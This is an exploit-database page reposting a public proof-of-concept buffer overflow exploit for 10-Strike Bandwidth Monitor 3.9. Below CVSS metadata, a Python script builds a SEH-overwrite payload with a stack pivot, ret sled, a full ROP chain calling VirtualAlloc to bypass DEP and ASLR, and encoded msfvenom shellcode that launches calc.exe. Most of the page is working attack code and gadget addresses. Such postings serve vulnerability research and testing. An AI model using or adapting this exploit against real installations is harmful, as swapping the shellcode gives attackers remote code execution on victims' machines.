10-Strike Bandwidth Monitor 3.9 Buffer Overflow
CVE
Category
Price
Severity
CVE-2007-1911
CWE-119
$5,000
High
Author
Risk
Exploitation Type
Date
Anonymous
Critical
Remote
2020-06-08
CVSS vector description
Metric
Value
Metric Description
Value Description
Attack vector Network AV The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230). Attack Complexity Low AC The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system. Privileges Required None PR The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. Scope S An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized. Confidentiality High C There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data. Integrity Low I Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system. Availability None A There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060035 Below is a copy:
10-Strike Bandwidth Monitor 3.9 Buffer Overflow # Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
# 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
# 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
# - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
# 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
# 4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP.
# 5. Pass execution to shellcode and PopCalc.
# - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
# Recreate:
# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------
import struct
OS_retSled = '\x41'*400
retSled = '\x24\x01\x06\x11'*100 #11060124 # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}
# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc
# 0014EAA0 110495EF .... LIBEAY32.110495EF
# 0014EAA4 1202EF02 .... /CALL to VirtualAlloc
# 0014EAA8 0014EABC .... |Address = 0014EABC
# 0014EAAC 00000001 .... |Size = 1
# 0014EAB0 00001000 .... |AllocationType = MEM_COMMIT
# 0014EAB4 00000040 @... \Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8 110E7198 .q.. <&KERNEL32.VirtualAlloc>
# 0014EABC 110843B4 .C.. LIBEAY32.110843B4
# 0014EAC0 90909090 ....
def createRopChain():
# rop chain generated with mona.py - www.corelan.be
ropGadgets = [
0x1202ef02, # POP EBP # RETN [ssleay32.dll]
0x1202ef02, # skip 4 bytes [ssleay32.dll]
0x01215f16, # POP EBX # RETN [BandMonitor.exe]
0xffffffff, #
0x012175f5, # INC EBX # RETN [BandMonitor.exe]
0x01056ff7, # INC EBX # RETN [BandMonitor.exe]
0x011e94d4, # POP EDX # RETN [BandMonitor.exe]
0xffffefff, # Value to negate, destination value : 0x00001000
0x01218952, # NEG EDX # RETN [BandMonitor.exe]
0x011ead1b, # DEC EDX # RETN [BandMonitor.exe]
0x110c5b5e, # POP ECX # RETN [LIBEAY32.dll]
0xffffffff, #
0x11016023, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1202fe55, # POP EDI # RETN [ssleay32.dll]
0x01225803, # RETN (ROP NOP) [BandMonitor.exe]
0x1105ed16, # POP ESI # RETN [LIBEAY32.dll]
0x110495ef, # JMP [EAX] [LIBEAY32.dll]
0x012126f5, # POP EAX # RETN [BandMonitor.exe]
0x110e7198, # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
0x110762c4, # PUSHAD # RETN [LIBEAY32.dll]
0x110843b4, # ptr to 'push esp # ret ' [LIBEAY32.dll]
]
return ''.join(struct.pack('<I', _) for _ in ropGadgets)
ropChain = createRopChain()
nopSled = '\x90'*100
# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x0d\x0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
shellcode = b""
shellcode += b"\xbf\xd2\xa1\xc4\xd3\xda\xdb\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x31\x83\xc6\x04\x31\x7e\x0f"
shellcode += b"\x03\x7e\xdd\x43\x31\x2f\x09\x01\xba\xd0\xc9"
shellcode += b"\x66\x32\x35\xf8\xa6\x20\x3d\xaa\x16\x22\x13"
shellcode += b"\x46\xdc\x66\x80\xdd\x90\xae\xa7\x56\x1e\x89"
shellcode += b"\x86\x67\x33\xe9\x89\xeb\x4e\x3e\x6a\xd2\x80"
shellcode += b"\x33\x6b\x13\xfc\xbe\x39\xcc\x8a\x6d\xae\x79"
shellcode += b"\xc6\xad\x45\x31\xc6\xb5\xba\x81\xe9\x94\x6c"
shellcode += b"\x9a\xb3\x36\x8e\x4f\xc8\x7e\x88\x8c\xf5\xc9"
shellcode += b"\x23\x66\x81\xcb\xe5\xb7\x6a\x67\xc8\x78\x99"
shellcode += b"\x79\x0c\xbe\x42\x0c\x64\xbd\xff\x17\xb3\xbc"
shellcode += b"\xdb\x92\x20\x66\xaf\x05\x8d\x97\x7c\xd3\x46"
shellcode += b"\x9b\xc9\x97\x01\xbf\xcc\x74\x3a\xbb\x45\x7b"
shellcode += b"\xed\x4a\x1d\x58\x29\x17\xc5\xc1\x68\xfd\xa8"
shellcode += b"\xfe\x6b\x5e\x14\x5b\xe7\x72\x41\xd6\xaa\x18"
shellcode += b"\x94\x64\xd1\x6e\x96\x76\xda\xde\xff\x47\x51"
shellcode += b"\xb1\x78\x58\xb0\xf6\x77\x12\x99\x5e\x10\xfb"
shellcode += b"\x4b\xe3\x7d\xfc\xa1\x27\x78\x7f\x40\xd7\x7f"
shellcode += b"\x9f\x21\xd2\xc4\x27\xd9\xae\x55\xc2\xdd\x1d"
shellcode += b"\x55\xc7\xbd\xc0\xc5\x8b\x6f\x67\x6e\x29\x70"
OS_nSEH = '\x43'*(4188-600-200-len(ropChain+nopSled+shellcode))
nSEH = '\x44'*4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
SEH = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
extra = '\x44'*2000
buffer = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra
File = 'poc.txt'
try:
payload = buffer
f = open(File, 'w')
f.write(payload)
f.close()
print File + " created successfully"
except:
print File + ' failed to create'
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum